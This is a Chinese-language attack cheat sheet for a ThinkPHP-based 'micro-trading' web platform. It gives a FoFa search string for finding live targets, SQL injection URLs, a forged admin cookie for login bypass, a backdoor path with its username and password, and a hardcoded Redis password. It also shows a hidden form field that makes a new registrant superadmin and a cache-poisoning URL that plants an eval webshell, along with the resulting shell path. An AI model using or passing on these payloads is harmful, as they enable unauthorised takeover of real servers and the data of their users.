FoFa关键词: “/static/index/js/lk/order.js”

SQL注入

注入一

/index/index/Goods/ajaxkdata/pid/1*

也可以Post注入 Pid=1*

注入二

/index/goods/goods/pid/23*/token/xxx.html

后台登录绕过

万能cookie

denglu=think%3A%7B%22otype%22%3A%223%22%2C%22userid%22%3A%221%22%2C%22username%22%3A%22admin%22%2C%22token%22%3A%223c341b110c44ad9e7da4160e4f865b63%22%7D

denglu=think:{"otype":"3","userid":"1","token":"3c341b110c44ad9e7da4160e4f865b63"}

后台任意文件上传

后台logo处没有过滤导致任意文件上传

TP日志泄露

此微盘一般为tp5.0 日志对应格式为 Runtime/log/年月/日期.log

TP5 RCE

如开了Debug 看TP版本号可尝试RCE

绿图后门

后门地址为:thinkphp/library/traits/think/library/upload.php

账号:syguest

密码:lostdodo

这个后门现在很少遇见不过可以尝试尝试

Adminer

某些版本存在

默认路径 \static\public\js\adminer.php

可用adminer任意文件读取漏洞 或者利用以上注入报错得到数据库账号密码链接。

img

Redis

某些版本存在

1
2
3
4
protected $options = [
        'host'       => '127.0.0.1',
        'port'       => 6767,
        'password'   => 'KKll23#j&2js5665J8',

前台注册超管账号

前台注册 直接加入 <input type="hidden" name="otype" value="3">

img

直接正常注册 成为超级管理员

img

前台缓存GETSHELL

直接访问

http://xxx.com/index/pay/qdb_notify?orderid=%0d%0a@eval($_POST[%270%27]);phpinfo();//;

image-20220429144358662

随即访问

/runtime/cache/0b/412699dcbe98d86a38f1e6f7f587ca.php

image-20220429144513911

Getshell成功。

The End…